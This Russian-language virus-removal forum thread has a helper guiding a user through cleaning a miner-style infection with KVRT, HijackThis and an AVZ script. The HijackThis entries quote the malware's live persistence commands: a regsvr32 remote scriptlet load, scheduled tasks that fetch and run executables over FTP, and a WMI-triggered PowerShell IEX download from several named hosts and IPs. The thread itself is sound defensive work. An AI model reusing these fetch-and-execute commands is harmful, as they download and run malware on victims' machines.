Тормозит ноутбук после запуска u.exe (lsma12.exe)

[cerealguy3456]

После включения через пару минут запускается командная строка которая включает u.exe. Затем ноутбук зависает, не реагирует и не отключается. По адресу где расположен u.exe C:\Windows\inf\aspnet есть еще lsma12. 
Ноутбук работает только в безопасном режиме. 

Пожалуйста, подскажите как удалить вирус? 

 

 

CollectionLog-2020.02.13-14.24.zip

Изменено 13 февраля, 2020 пользователем cerealguy3456

[Sandor]

Здравствуйте!

 

Пролечите систему с помощью KVRT.

По окончании зайдите в папку C:\KVRT_Data\, упакуйте папку Reports в архив и прикрепите к следующему сообщению.

 

Также соберите новый CollectionLog Автологером (пробуйте в нормальном режиме).

[cerealguy3456]

Здравствуйте! 
Спасибо за ответ! 
К сожалению в нормальном режиме так и не удалось просканировать и сделать лог. Даже проверка KVRT была в нормальном режиме один раз прервана. Файлы u.exe и lsma12.exe после удаления появляются снова.
 

 

Reports.rar

CollectionLog-2020.02.13-20.05.zip

[Sandor]

"Пофиксите" в HijackThis:

O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX 

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

 

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 ClearQuarantineEx(true);
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('c:\windows\help\lsmosee.exe', '');
 QuarantineFile('c:\windows\inf\aspnet\lsma12.exe', '');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteSchedulerTask('VKDJ');
 DeleteFile('c:\windows\debug\item.dat', '32');
 DeleteFile('c:\windows\debug\ok.dat', '32');
 DeleteFile('c:\windows\help\lsmosee.exe', '32');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '32');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится.

 

Пробуйте дальше работать в нормальном режиме.

 

После перезагрузки выполните такой скрипт:

 

begin
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
end.

Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KL-).

 

 

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.

Прикрепите к следующему сообщению свежий CollectionLog.